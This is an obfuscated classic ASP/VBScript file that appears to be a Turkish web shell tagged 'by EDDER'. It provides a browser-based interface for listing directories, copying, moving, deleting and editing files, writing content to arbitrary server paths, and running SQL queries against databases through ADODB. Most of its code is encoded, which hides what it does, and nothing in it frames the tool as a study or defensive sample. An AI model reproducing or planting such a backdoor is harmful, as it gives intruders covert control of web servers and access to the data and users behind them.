~~'_ZTcZ$2cT@#@&,PP,P,~PVM~mBP[S,l~,8~,6`0~QP8F*~~?+fBP'Cy*A*)X8@#@&~~,P~P,~VM~(~,m~,NB~lBPa`0PQ~Z#~,j W~PLu3,~v;G)b@#@&,P~P,~P,M!~m~P8S,mSP9S,6c0P3P**~,j 8~~[_f+wF!l9@#@&PP,~~P,PVM~NS~m~~4B~mBPac0P_~qZ#SPU+y~~LCycc8clf@#@&P~P,P~~,MM,^~,N~,CSP(~,6c3~Q,FX#B~?y&S~LCf0)82%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNBPXc3,_~,*~~jyF~,'CyF28/92+@#@&P~P~~,P~MV~NBPCS,4~~^BPa`0~3PqW#BP?y B~[_Zf&F!{9+@#@&,~P,PP,~!M,mBP[~~CBP8~,a`0PQ~2#~~jy&SPLuwc9l!G%G@#@&,~P,P~P,M!~(~P1SP9~PmS~6v3,_~%bS,?+cB~[_cXXzFc39@#@&~P,~,P~,MVPlBP(SP1~~NBPac0P_,q&*~PU+q~,[_b12f3O!X@#@&~P,P~~,PM!~9~~lB~(~~1~,6`0P3~ *~~?y S~LCs;3sz&sR@#@&P,P,P~P~!VP^~,[~,lS~(~Pac0PQPFbBPjy&BP[_vFsZ 9,@#@&~~,PP,~PVMP(S~mBP9~~lS~X`VP3~Fy#S~U cS~LC0fy)WZ0z@#@&PP,P,~P,P~P,@#@&~,PP,~P,CC,CSP(~,mSP[S,6c3,QPl#S~U&FS~LCosw)2,*y@#@&PP,P,~P,CuP9~~CBP4B~mBP6vV~_,%*~~?f+BP'CR{G8s08@#@&~~,P~P,~_C~1~,N~,lB~4BPa`0PQ~8F#B~?2&~,'uvG,Gvq +@#@&P~P,~P,Puu,4~~^BP[~,CBPav3,_P8c*SPU&*~,[uoG2*20!;@#@&,~~P,P,PuC~CBP8~,^~,NS~X`3~Q,Fb~,j2FS,[_bc~2A)cW@#@&P,P~~,PP_uP9~PmS~4BP1~~6cV,_~c*SPU&+S,[C*$G2/sz1@#@&~,P,PP,P_uP1~~NBPCS,4~,a`0P_,{b~,?2&SP'uwv$AW$vZ@#@&~,PP~~,PuC,8BP^BP9~Pm~,a`0PQP8!bS,?&WSPLCAA$oA;GZ@#@&P~~,P~P,uC,lS~(~P^S,NSPXc0PQ,F2#~,?2q~,[u R,${AZv@#@&P,PP,~~P_C,NSPCS,4SP1SPX`V~3P!bS,?f B~LC3zb8 Gwb@#@&P,P~P,P~u_PmB~NBPlB~8~,6v3~_~f*~~?2f~,[u9W2sfTR*@#@&,~,P~,P,CC,4B~mBP[~,lS~X`3,QP+#~,jfcBPLC*%0qG!X@#@&~P,P~~,PCu~m~~4B~1~~9~,6`0P3~,*~~?2FS~LCfO9cG!&O@#@&P,P,P~P~u_P[~,C~,4S~1~Pac0PQP8+*~~U&y~PLCAf~,12l@#@&~,PP,~P,CC,^SP9~,lSP8S,6c3,QP8*bS,?&fS,[uFw)yG/w%@#@&P,P,~P,PuC,4S~1~P9SPm~PXcVP3Py#SPjfW~~[_/czZX+*@#@&~,P~@#@&~,P~,P,Pq&PmSP(~~mBP[S,6`0~_,!#B~jc8~,[us*+O +cW@#@&,P~~,PP~(&P[~,CBP8BP1~PX`0~_,Gb~,?*+BP[_*&ybsw1{@#@&P,P~P~~,q(P1SP9~~CBP4S~X`VP3~8cbBPUc&BPLub~,* 2b{@#@&PP,~P,PP&(~4BP1~~NS~m~~6vVP3PXbBP?**BP'Cw/O&)Z&O@#@&,P,~P,P~q&PCS,4~,^~,N~,ac3,_,F+#S~Ucq~,'C+*X$l,Zf@#@&P~P,~,P~&q,N~,lB~4BP^~,6cV,_P2b~,?cyS~[_%w!/Z/1y@#@&P,~P,P~~&qP^S,NSPmS,4S,6v3P3P8T#BPjc2~~'_ssAosWGf@#@&~P,P,P~P((,4SP1SP9~~CBP6cV,_~F*S,?*W~,[CR*R**Gfq@#@&P~~,PP,~q&PlB~8~,mBP[~~av3~_,0#BPj*8~P'u+s)%F3Ws@#@&P,PP,P,~q&P[~,lS~(~P1SPX`3,Q~Fl#BPjc+S,[usA+ZAv3T@#@&P~~,P~P,(&P^BP9~Pm~,8~,6c3,_~*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~P,P&q~lS~(~~mB~NBPac0P_~**~~?WqBP'_sF*&F2R+@#@&P~P,P~~,qq,[~,l~,8SP1~,6c3~Q,Fq#B~?W S~LCA9fzs+&l@#@&P~,P,PP,q&~mBP[~,lS~(~PXc3,_PybSPUc2~~[u+zf{fy$A@#@&~~,PP~~,q(P(S,mS,NBPlBPXc3,_~,*~~jWc~,'CAA%+9f,8@#@&P~P~@#@&P~P,~P,PC~{Pb[[`xdkTUNcm~,bb*@#@&~P,P~P,P8~{Pb9[j	/kTUnNv4BP$Ab@#@&P~P,~P,P^~{Pb[[`xdkTUNc1~,ZZ*@#@&~P,P~P,P[~{Pb9[j	/kTUnNvNBP9fb@#@&P~P,H+XY@#@&,PP~@#@&P~P,\G*~{PdZlk+v	WMNPW_+acm#PL~KDN:Gu+X`(#~[~	KD[KKu+X`^b,[P	GMNPW_nX`[*#@#@&2	N,oE	mOkKx@#@&EeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMe@#@&vMCeeCMeCeeCMMeCeCeMeMMCeMeC~PtfX~nrNsCMýP$kDnMR~,PCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeC@#@&BCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCM@#@&kWPaW2;aP',ol^/+,O4+	@#@&BJkUV,\nPnGx!:~2mx+sr,4zPABG2]@#@&EKüD0P~CXMlðý~bkmrr,|lMC3D+D^n.VP P/DnCD+[P~zPwldP~W5~l*@#@&IdaWUk+cDbY~J@!mnxD+.@*@!Yl(s+,hk9O4'R!,tnkL4D'X!,^+^V2C9NkUL{!~ms^/2mmbxo{!@*@!YM@*@!Y9PAr9Yt{q!,lVbLU'^+6Y~\CsboU'srN9Vn~kYXsn{JE4m^0o.KE	NO1W^GD=b)!Z!TEr@*[	8/ai@!JO[@*@!Y9PAk[O4'{!,CVboUx^+0O~7lskTU{:r9N^+PkYHs+{JE4mmVLMWE	[O1WVK.lbz!Z!TJE@*@!0GxD~/bynxFP0C^'	k	L9kUT/@*}@!J0KUY@*@!&Y9@*@!&DD@*@!&Ym4V@*@!z1+	YnD@*E@#@&.+k2W	/n SDkOn,J@!mUD+.@*@!Dl4^+,Ak9Y4'rJqTZ]Jr~l^ko	xEJ1+	YnDEE@*J@#@&Mn/aWUdRh.rD+~J@!OMP-mVbox{JrOWaJE@*@!Y[~1WVk2l	'Jr+EJ,l^kLxxErmnxDnDrJ@*@!(D@*E@#@&Dn/aG	/nchMkYPr@!Ym4s+,mns^wl9[k	o'rETJrP1+sVd2mmrxTxJr!EE,t+rL4YxJr+lJE@*@!DD@*@!Y9~m^ld/{JEV(DYsEJ@*[x(d2iLx(/2i'U(/2i@!CP4DnW{BJ'obVnnmO4[EQ:KN+{&F'3Kx;:{J'VKxEs'JLKksnxJLYb:n[Ev@*@!8@*Ur/D+h~zxlsr.kM@!J8@*@!&m@*,uP@!l,4D0xBr[or^+nmOtLJgsG[+{FR[VWU;s'E[0Gx!:'ELKkhn{J'Ybh[EEPKxm^k1V'rJhlk/cO4k/c4D0#p.nY!D	PWlsdiEJ@*@!4@*H)jUPbOOmmV@!J8@*@!&m@*,uP@!l,4D0xBr[or^+nmOtLJgsG[+{ 8[VWU;s'E[wGV9+.KmYt'ELKr:xr[Ob:[JEPKUm^k^3{JEO/Y.`Dtkk 4D0*i.+O;Mx~0ms/iEE@*@!4@*~h+.:bdbWU,K/YD,@!z(@*@!zm@*~k,@!l,4D0'EE'sbVnCY4'rghW9n'yc'VKxEhxr[VW	;s[ELKb:+{JLOks+'JEPGU1Vk1V'rJ3^CdWM`Dtr/ 4M+W#p.+DE.U,0lsdiEJ@*@!(@*F^lköDPÝþ^+ss+Mk@!z(@*@!&m@*P-~@!mPtMnW'EJLsrVnKmY4[r_:KNnxy%[VG	Eh'r'0WU!:LJ[:ksn'r[Oks+'EEPW	^Vbm3{EEmsNvY4kd 4Dn0*IDY;.	P0Csk+IJr@*@!4@*,ZtfP@!z(@*@!Jl@*P-P@!C,tDW'EJ[wrs+hlDt'J_hKNn'2*[0WU;s'J'VKx;:LELKrs+{J[Dksn[rB~@*@!4@*~tXOtj{UpS,@!&4@*@!Jl@*Pk~@!l~tMn0{BE'wkVnKmY4[r_sW['W*[0W	;:{J'3Kx;hLJ[:r:'JLOr:[rB~WU^^k^3{EJ1:[cDtkd 4Dn0*IM+O!D	P0mVknirJ@*@!(@*~]o29rY,@!z(@*@!zm@*,u~@!C~4Dn0{vJLsrsnlO4LJ_:K['1O[0Wx!:{E[0WUEs[E':k:xJLYksn'JEPKx^Vr^0'EJ(ryvY4rkRt.n6#IDO!DU,0mV/irE@*@!4@*PCAr",|ksryC"P@!&8@*@!zm@*'x8dai'x(dwp[U8kwi@!&DN@*@!JOM@*@!JYm4V@*@!8D@*J@#@&M+d2Kx/ hMkY~E@!Dl(VnP^n^V2l9[k	oxEr!JE~1+sVk2mmr	o{JJZJr~tkLtD'EEy*Jr@*@!DD@*@!O[P1Vm/d'EE04.YsEJ@*[U8kwi'U(/2iLU(/2p@!mPtM+6xBr[ok^+KCDt[r_:KN+{fT[0W	Eh'E'0WUEs'JLKrh'J'Ob:n[rv,WU1Vbm3{Jr^:9`Otb/ 4M+0*IDYEMU~0mVk+IJE@*@!4@*PhrxTPjC^NýDýdý~@!z8@*@!&m@*~-P@!lP4DW'EJ'sbVnKmYtLEgsWNxf&L3Kx;:xEL3Gx!h[r[Prs+'E'Dkh+LEEPG	m^km0'rE3^ldWM3G2Hl`D4kkRtMnW#pDY;DU~6ls/IJr@*@!8@*PHCr^P$Ws8mD[ýsl	ýP@!J4@*@!zm@*~u,@!C~4D+6xBr[sbsnnmY4[EghG9+x&8'3Kx;h{J[VG	Eh[r':kh'r[Yb:'JEPGx1Vr^0'JrVVm/WMVGwHlvY4kd 4Dn0*IDY;.	P0Csk+IJr@*@!4@*,Im:PLP;2E,?CV9ýDýdý~@!z4@*@!zm@*P-~@!l,tM+W'vELsrVKlDt'EQ:W[n{&+[0G	Eh{JL3W	Es'JLKr:'E'Dk:'JEPW	^sk13{JE/Gh!DcY4r/ct.n6#i.nDE.x,WmVdirJ@*@!4@*~|mXUl0PjÖhüMümüP@!&4@*@!zm@*~u,@!mP4DnW{BE[wrVnCO4[J_hKNn'21L3G	Es'JL3KUEs[E[:khn{J[Dr:[JE~Gx1VbmV'EE0VC/K.`DtrdctDnW*i.+D;Mx~6l^/+pJr@*@!(@*~HG*'jD\ iP@!z4@*@!&l@*P-P@!l~4M+W'EE[wksnhlY4'rghW9n{c+L3KxEs'r'3Kx;:LJ'Pb:+{E[Dk:'EB,W	msk^V{JE:md/vY4rkRt.n6#IDO!DU,0mV/irE@*@!4@*Pt?	/:WW^dP@!z4@*@!&l@*P-P@!l~4M+W'EE[wksnhlY4'rghW9n{c*L3KxEs'r'3Kx;:LJ'Pb:+{E[Dk:'EB,W	msk^V{JE:md/vY4rkRt.n6#IDO!DU,0mV/irE@*@!4@*PoHJu:Kn,@!z(@*@!JC@*[	4kwI[U8kwI[	8/ai@!&DN@*@!&DD@*@!JOm4s@*@!4D@*J@#@&D/2W	/n SDkDnPr@!zD[@*@!JYM@*@!Y[@*@!Y.@*@!WWM:~C1YkGU,'~Jr~r[obVnlDtLEgsW[+{ f'0Wx!h'r[3KU;:LJLKr:nxr[Oksn[rPEE,:+O4KNxJr2K/OrJ@*@!Ym4^nP1+sVal[[bxo{EJZJJ,^nV^/al^kUL{JE!rE@*@!Y.@*@!YN~dDXs+{Er4C13TDW!x9RmKVGD=F+qyF rEP1VlkdxJr3(DO:EE@*[U4k2iLx8dai[U8kwI@!(@*zDCsl=P[	4k2iLx8/ai'U(/wp@!z(@*@!JO[@*@!Y9@*@!kU2!Y~xmh+{JE4mm3n[rJ~\ms!+xrJsN4rJ,OXa+xJrYnaDJJ,dYHV+{EEhbNDtl TTa6IJr@*@!JY[@*@!YN@*@!bx2ED~DX2'rJ?!4srYrJ~\mV;n{JJLU4kwiLU8/aizDCP'.m;;Wp'x(/2ILx4d2pJEPkOHVn{Jrhk9Y4lGZi~0KxORS+kT4Y=4W^[IJr@*@!zON@*@!JY.@*@!&Ym4sn@*@!zO[@*@!&0K.s@*@!JYM@*@!DN@*@!YM@*E@#@&DndaWxknRSDkDn~J@!0KDhPC^DkGx,xPrJ~ELsksnhlOtLEQ:G9+{F[:ksn'r[Oks+'E,JJ,h+DtW9xEJaWkYEJ@*E@#@&.+k2W	/n SDkOn,J@!Ym8^+~1+^VwmN9rxT'EJZJE~1+V^dwmmk	LxJr!rJ@*@!O.@*@!ON,dYHVnxrJ4C^0o.W!U9O^KVKD)8 8+FyJEP1VCdk'JrV4MY:rE@*[	4kwI[U8kwI[	8/ai@!8@*|WU;sPlPLU(/2p[	4/aiLU4kwI@!J4@*@!JYN@*@!Y9@*@!bU2EDP	lh+xErDn:KO+rJ~-mVEnxEJ'3KU!:'rB,YXa+{EJD+aYrJ~dDXVxJrhk9O4)2*ZwaiEE@*@!&Y9@*@!DN@*@!bxw;O,YzwxrJj!4skYrJ,-l^En'rJ!rDP[MC;!WirE~/DX^+xJEAbNOt=X!pPWG	YOAnbo4Y=8KV[pJr@*@!JY9@*@!JY.@*@!zOC(V+@*E@#@&D+k2Gxk+ch.kOn,JE@#@&.+kwGUk+RA.bYnPr@!JY[@*@!J0WM:@*@!zDD@*J@#@&.nkwW	d+chDbOnPr@!JYC4sn@*@!&mUYD@*E@#@&@#@&vI+O3b~alUVbP4HPABfAI@#@&M+d2Kx/ hMkY~E@!Dl(VnPAr9Y4'rEFZ!YEr@*J@#@&M+dwKUk+ SDbY+,J@!OD,\CVboUxrJYK2Jr@*@!D[~mKVkwCxxEr EJ,CVboUxrJmnUD+.Jr@*r@#@&M+kwW	/ hMkO+,J@!Om4V~mVVaC[NbxT'EJTErP^+^s/al^r	o'EEZJE@*r@#@&DnkwKx/RS.kD+~J@!Y.@*@!YN,dYHV+{EE4mm0o.W;U9O^W^GD=F+qyF EE,mslkd{JE04MY:rJ@*'x(/2iLx8dai[	8/ai@!(@*e+D3bPl@!&8@*[U4k2iLx8dai[U8kwI@!JO9@*E@#@&1lV^PHnY0k@#@&M+d2Kx/ hMkY~E@!JYM@*@!zOC(Vn@*r@#@&M+d2Kx/n SDrY~r@!8M@*@!zY9@*@!&YM@*@!zDl8s@*@!(.@*r@#@&U[Pb0@#@&@#@&@#@&@#@&j2d3Z:P/)U2PhG9+@#@&;)U2~yPEPfbybUP0W2XmVC~:bÞq,8X,29G3]@#@&W	PnD.GMP.+k;:PUnXY@#@&./2W	dRAMkD+Pr@!DC4^+~hbNO4{JJ8T!uJJ@*E@#@&M+kwGxdnch.kDnPr@!O.,mVCdk'EJ08MYhrJ,\l^kTU'rJOWaJE@*@!YN,^W^/wmUxJr rJ~lsrTxxJr^+	Yn.rJ@*E@#@&Dn/aG	/nchMkYPr@!0KDhP	lhn{JJ9rybxmK2zwm/D+EJ~C1YrW	xBr[or^+nCO4[EB,OHwn{JrwWkYrE@*r@#@&D/2G	/+cADbY+,E@!Ym4^+~msCk/xJrV4MYhErPmns^wCN9r	oxrJ8JJ,msVkwCmbxLxrJFrEP(omKsGD{JraXNX[lNEJ,Ak9Y4xrJFTTuJE@*r@#@&YC(VK&!vJ,@!4@*frybx~FKwXmsl,zP:Cþý~HD0+"k@!&(@*E#@#@&Ym4sG2!`E'	4dwpE*@#@&M+kwW	/ hMkO+,J@!r	wED~YHw+{EEtbN9+UJE~7lsExJr&EE,xlhn{JE:K[JE@*@!bxw!Y,OXa+xJrtr[9+xrEP7lV!nxJL0bVn[E~	lh+{EJ6ksnyJJ@*@!bx2ED~DX2'rJtbN9nxrJ~\mV;n{J[wGV9+DhCOtLJ,xC:nxrJVW	;:rJ@*@!bxw;O,YzwxrJ4bN9+xrJ,-l^En'r[Ors+[r~xm:+{EEKb:JE@*~E,@#@&Ym8VKF+cr|W2 ,5nD,l,@!r	w!YPkYHs+{B^W^W.x[Zvw/AABP,dry'rJ!EE,YzwxJrYnaDJJ~Um:n'rEwWs9+MnlDtyEJ,\CV!+xELsW^[+MnlD4'J@*J*@#@&YC8^Wq vE@!bx2;DPYz2'.l9rKPUm:'Bb/^n:EP-l^EnxE3Wazl^lB,^4+13N@*|G2Hlsl,~@!bx2;DPYz2'.l9rKPUm:'Bb/^n:EP-l^EnxEYlkrB@*Klkr~J*@#@&YC4sG8 cJ@!8D@*@!rUaEY~-mV;+{ErP!ö	NDPrJ,OXa+xJr?;8skYrE@*r#@#@&.n/aW	/nRA.bYnPr@!z6W.h@*@!zOC(Vn@*@!&DN@*@!zDD@*@!zDC4^+@*@!(D@*E@#@&ZmsV,ClDC@#@&@#@&;bj2~f,B~Nb"k	PVGaPYCþýhm:~o.ç3sþkHWD,P(zPA992"@#@&G	P+M.WMPDd;:P	+aY@#@&b0~kks+s'EVKwXCsmJ~Y4n	@#@&,P,PsUrc/WaXoW^Nn.,3W	;:BsW^[nDhlDt+@#@&~,P~kks'r3G2HlVCU9ýR J@#@&Vdk6PkkVh'rYC/bJ~O4+x@#@&P,PPwj6RtW7+oWs[D~3KUEs~oG^N+.KmY4 @#@&,P~,kkV'rYmþýUNýcRE@#@&+U[,k0@#@&D/wKUd+cMkO+~E@!4.@*@!8D@*@!^n	Y+.@*nVC/K.,J'b/^[J,@!(.@*r@#@&D/2G	/+c	DbY+,E@!4M@*@!0GxO~1WsWMxXVsGS@*|Cz	lVP=~@!zWKxD@*JLsKsNDKlDt'E@!4D@*@!0KxY,^GVKD{XnVsGS@*u+9n0,)~@!J0WUO@*J'sKs9+.hlDt @#@&Mn/aWU/R	.bY+,E@!(D@*@!8.@*(X,2%Nn.@!z^+	O+M@*E@#@&Zlss,CCYm@#@&@#@&;bU2PWPE~fbyrx,?Ýsh+P(zPA9fA]@#@&Kx,+.DG.,Dn/!h+,xnaD@#@&oj}R9+^nD+oKV9+D,Ns@#@&kWPD.@!@*!PD4+	@#@&;CsV,W^:CNrcrfrybUPUksn	+:[rr#@#@&sk+@#@&ZmVV,W^[EvJ9k.kU~UkVbUNbJ#@#@&nx9Pb0@#@&@#@&;bj2,XPEP9GkXl~dbVh+,G^lzý,oDç+0VbþrXaW.P,4z~A9fA]@#@&Wx,n.DKD,Dn/;hPU+XO@#@&sj6cf+snD+ok^n,Nn^@#@&k0,+M.@!@*!~Y4+U@#@&Zl^sPKV:m[r`rfK/zl~jbVrxh+9kEb@#@&+sd@#@&Zms^PG^N!`JGWkzl,?rVbx[rr#@#@&nx9Pk6@#@&@#@&B;bj2~,B~fKdXmP9GSVlG[,+O:~(X~A9G2I@#@&E~fKhUVKl[~4lYmsýPKVN!ð;~kçbxBPÜjKP3,YCþýNýsh@#@&@#@&/z?2~{,B~fKdHl~nWalX^l,Plþýsl~n}?P~0ý/:ý,8X,29G3]@#@&W	PnD.GMP.+k;:PUnXY@#@&./2W	dRAMkD+Pr@!DC4^+~hbNO4{JJ8T!uJJ@*E@#@&M+kwGxdnch.kDnPr@!O.,mVCdk'EJ08MYhrJ,\l^kTU'rJOWaJE@*@!YN,^W^/wmUxJr rJ~lsrTxxJr^+	Yn.rJ@*E@#@&Dn/aG	/nchMkYPr@!0KDhP	lhn{JJ9G/HlmK2zwm/D+EJ~C1YrW	xBr[or^+nCO4[EB,OHwn{JrwWkYrE@*r@#@&D/2G	/+cADbY+,E@!Ym4^+~msCk/xJrV4MYhErPmns^wCN9r	oxrJ8JJ,msVkwCmbxLxrJFrEP(omKsGD{JraXNX[lNEJ,Ak9Y4xrJFTTuJE@*r@#@&YC(VK&!vJ,@!4@*fG/Hl~FKwXmsl,zP:Cþý~HD0+"k@!&(@*E#@#@&Ym4sG2!`E'	4dwpE*@#@&M+kwW	/ hMkO+,J@!r	wED~YHw+{EEtbN9+UJE~7lsExJr%EE,xlhn{JE:K[JE@*@!bxw!Y,OXa+xJrtr[9+xrEP7lV!nxJLYb:n[E~	lh+{EJ:khnrJ@*@!r	w;Y,OHwn{Jrtk9NUJrP-l^Enxr[0bs+LJP	Ch+{Jr0rVnEr@*~J,@#@&Dl8sKF cEnW2R,eD~=P@!kxaED~Pkk"+{JEZJJ,OXa+'rEO+XYrJ~xCh'EJ6GV9+.ErP\Cs!+xJLWbVnLJ@*J#@#@&DC4^Wq vJ@!r	wED~YHw+{.CNbW,xC:nxEkdVhB,\Cs!+'vVKwzl^CEP^4+13+9@*nGwHlsl,P@!r	wED~YHw+{.CNbW,xC:nxEkdVhB,\Cs!+'vOm/rB@*Pm/r,J*@#@&Dl(sW8 cJ@!4.@*@!kxa;Y,\l^;n'rJ,MöUNn.,JEPDzw'EEUE4hrDJE@*rb@#@&./aWxk+cADbYnPr@!&WKD:@*@!zDl4^n@*@!JY9@*@!zO.@*@!&Ym8V@*@!8M@*J@#@&;lsV,umYC@#@&@#@&Zz?A~%,B~fK/zC,3Wazl^l~,OCþý:ml,Wslzý~(X~2x92"@#@&G	P+..KD~Dd!:n,x6Y@#@&bWPb/s+s'EVKwXmslrPY4nU@#@&P,P~sj6cZGwHok^+~WbV+SWKV[+M'rJ@#@&P,PPb/^xJ0W2XmVCU9ýRRr@#@&V/rWPb/^+h'EOm/rJ,Otx@#@&,PP~oUr HK-sr^+,0k^+BWW^NnDLJE@#@&PP,~kkV'rOCþýx9ýRcJ@#@&nU9Pr0@#@&k6Pn.MP@!@*~ZPOtU@#@&./aWxk+c	DbYnPr@!8.@*@!4M@*@!1+xDn.@*~lþmDýdýysýV^l~/KUEç^lU[ý,""Z~@!4.@*r@#@&+sk+@#@&D/aGxk+ MkOn,J@!(.@*@!4D@*@!^+	YD@*|sCkW.Pr'kkV'E,@!4.@*r@#@&+	[,kW@#@&M+/aW	d+c.kD+~E@!4D@*@!0KxY,^GVKD{XnVsGS@*FlHUl0Pl~@!z0GUD@*E[6r^+'r@!(D@*@!0KUY,mGVKDxzVVKA@*_+NW~),@!J0GxO@*r[WW^[+M[Ewr@#@&.nkwGxknc.bYPJ@!4M@*@!(D@*4HP3%9+D@!&mxY.@*J@#@&;lsV~umYC@#@&@#@&;bj3,,Pv~GWdXm~Ýçbxr,oöMüxYü^+,8X,2BfAI@#@&KxP.DKDPMndEs+,xn6O@#@&In/aGxk+ 	MkYn~r@!^+	OD@*@!4@*@!0KxD~mKVGD{W.C	o+@*E[alY4'E@!J0KxO@*@!&(@*@!z1nxD+.@*@!4D@*E@#@&]+k2KxdRqDkD+,E@!Dl8VP^sm//{EJ04DDhEJ,hbNOtxqZ!YP@*@!YM@*@!O9@*J@#@&k+OP6~{PoUrcrwx:n6DsrV`Wr^+~8b@#@&I+k2Gxk+c.kOn,J@!0KUY,/r"'&@*@!aDn@*r'U+.7+MRC:Hd3x1W[+v0 .lNzsV*[J@!&2D@*@!zWWUO@*J@#@&"n/aWUdR.rD+~J@!&DN@*@!zDD@*@!zDC4^+@*J@#@&UG^k/D~',KD!n@#@&b0,+.D@!@*+ ~Y4nx,CCOm@#@&rW,+.DcU!:8D{v ,Y4nx,@#@&I/2G	/+c	DbY+,E@!/1DbwOPsC	o;lTn'Nl-CkmDr2D@*CV.D`v~E,fWkXm~r0EUlsýXG.'x?bdY:P9GdXm/ý,Wsl8r^k.B*@!zkm.raY@*E@#@&xGVbdDPx,smV/@#@&nx9Pr0@#@&@#@&;b?A~FZPB,)jn,YXY~w42,R PTr4bP[GkXlsCMýP3NbO^+h3,kçk	Ph6?DPVý/sýP8z,29G3I,@#@&KU~+MDKD~Dnd!:nP	n6D@#@&dYPW~{Po?} }wn	K6Ywk^n`6ks+BFb@#@&D+k2W	/+c	.kD+,J@!mnUD+.@*@!WWM:~C1YkGU{BE[wr^+KmY4[JQKbh+{J'Yb:n'r[3KUEs'JLoGV9+MnCY4'rB~:OtKNxErwWdOrJ@*@!DC(Vn,m^l/k'rE3(DO:rJ@*@!DD@*@!ON,lVbLU'rJ1+UYn.rJ@*J@#@&I/2G	/+ 	MkO+,E@!kUaEDPYHwxtbN[+	PUCs+'rE:KN+rE~\mV!+xBqqE@*E@#@&]+kwGUk+R	.bYnPr@!bx2!Y,YXa+{4k9Nnx,xCh'0bs+,\l^;n'r[6ks+'E@*J@#@&"n/aWUdR.rD+~J@!8M@*@!(D@*@!k	w!OPDX2+{/;8skY,-l^E+{EEPcR,)lP~~nlzNOP,)l~cRP~Er@*@!4M@*@!4.@*@!JYN@*@!JOD@*@!OD@*@!O[,lVbLx{JJ1nUYDrJ@*J@#@&"+dwKU/R	.bY+~E@!Yn6DCM+C,xm:+{Jrr/^+hJrPdOHV+{vhbNY4l1!ui4+ro4O=&X!pv@*r@#@&]/wGUk+ MrD+~k+M\+MR_PHd2UmKNnc6RDCNzVV*@#@&I/aWU/n qDrY~J@!zOnXYl.nm@*@!zD[@*@!&DD@*@!zDl(s+@*@!&0KDh@*@!zmUYD@*r@#@&ZmV^PulOC@#@&UW^r/DPx~:DEn@#@&@#@&ZzjAPq8PEP29kDs+s+~W^lzýý~T+DçVVþkXK..P(X,2Bf3]@#@&Gx,nDMW.~M+/;hPU+XO@#@&dY,/l7+:n6DsrVPx~w?rc6wxKaOsbV`WksnB SYM;+B0Csk+#@#@&;lsV,umYC@#@&kl\KaYwks+c.rD+`bdV:#@#@&dl7+:+aYor^+ m^G/@#@&r6P+..@!@*TPD4x@#@&W^:l9kvE29kOVxnhNkbE#@#@&+^dn@#@&W^N;`E39kOVUNbJb@#@&+x[~b0@#@&@#@&;bjAP8 PEP"n/b:~fK/zCkýxýPVö.üxDüV+~~4HPA992]@#@&WUP.DKD~./Ehn,xn6D@#@&InkwKx/Rq.kD+~J@!4.@*@!m+	O+M@*@!bhLPzS:'EJjCj?C|c/WtP8z,2993"Px#,ErPdMm{BJL0bs+LJv@*@!z^n	Y+M@*@!(D@*@!8.@*r@#@&ZCVs~_lOl@#@&xKVrdDP'~PMEn@#@&@#@&Z)U2,F&,B,jpdPrçk	PP)(VW^CDý,SkkOnV:P8X~3xf3I@#@&I/2G	/+ 	MkO+,E@!mn	YD@*@!4@*@!0KxOPkk"n{&@*:C4^WVm.@!z6W	Y@*@!&8M@*@!4M@*J@#@&jnDPW8%;WUx,x,?nM\DR;DCYr8LmOcrbf}9AcZW	UnmDkKxE#@#@&U+OPK8Lzf6p,'PjnM\nDc/M+CD+}4LmDcJzf6(cZCOmVWTE#@#@&W(%/W	xcn.W-r9+.P{~Jtk^.K/WWOc9nYc6^+[(RWR!r@#@&G4NZGx	R/G	x+1OkKx?D.rxTP{PWksn@#@&G4N/W	x 6a+x@#@&K4%bG6oR)1Yb\+;W	U+1YrW	Px~K4L;Gx	@#@&@#@&.+kwKxd+ AMkO+,E@!Dl8sPmsCk/xJrV(DOsJr@*J@#@&wGD,2Cm4POC(V+,rx,W4N)9roR:l8Vnd@#@&~P,~q6POC(V+ PHwnP{~rK)~SAJP:tU@#@&P~P,P~~,I+k2W	/+c	.kD+,J@!Y.@*@!Y[@*@!WW	Y~Wmm+xAbxLNbUT/~kk.+'l@*W@!z6WUY@*P@!C,tDW'EJ[wrs+hlDt'J_hKNn'8*[6ksn{J[Wr^+'JLOm4s'r[Ym4^nRglh+LJ'VKxEsxJLsW^[nDhlDt'J'Ob:n'r'Yb:n'rB@*E'Dl8V glh[r@!zm@*@!&Y9@*@!zDD@*E@#@&P,~PAxN,(W@#@&16O@#@&./2W	d+ch.rD+PE@!JYC4^n@*J@#@&D/wKxknRSDrYPE@!Jm+	O+M@*J@#@&/l^V,CCYC@#@&xGVbdY,'~PME+@#@&@#@&/bU3,F*,B,Kb(VK~kçDrðk,oö.üUDüV+snP(XPAB92"@#@&ZCVs~UpJ{snx!{8z|2L[nM@#@&Zms^Pj5S|4X|2x92"`Wk^+SOm4Vb@#@&xW^rdY,',K.En@#@&@#@&Zzj2,FX~EP?}J,3GN,zDsþYbD:PKslHýP8X,2B9AI@#@&r0,k/^nhP{Pr/nVn^DJ~Y4nx,kU%mY~x,kUL^DF@#@&k6PkkVhP{PENVnOJPD4+	Pk	%nmDP{Prx%n1Y+@#@&r0,kds:Px~rkU/.DJ~DtxPbxNnmDPxPbx%n1Y&@#@&k6Pkksn:,',J;w[CD+EPD4+	PrUN+mO~{PrxNn1Y*@#@&b0Pb/^n:,'~J9kLnMJPD4+	Pk	%nmDP{Prx%n1YX@#@&jpd{hn	E{8z|2%N.@#@&./aWxk+cADbYnPr@!8.@*@!mUYD@*G8~5DbPlP@!WKxOP1GVKDx:;vs/$A@*E[6r^+'r@!J0W	Y@*@!z1+UYD@*E@#@&DdwKx/ ADbYPE@!8.@*@!^+	O+M@*j5^P3Gh!Y~),@!6WUDP1WVKD{:Z+s/AA@*E'bxL^YLJ@!JWGxD@*@!z^+UOD@*@!(.@*r@#@&r6Pkds:~',Ek+smDJPDtU@#@&dr0,xGO,+L9nDk;V,x~JrPDtnx@#@&id/l^sPt?j}d{4zmA992"cL[Dk;VBk	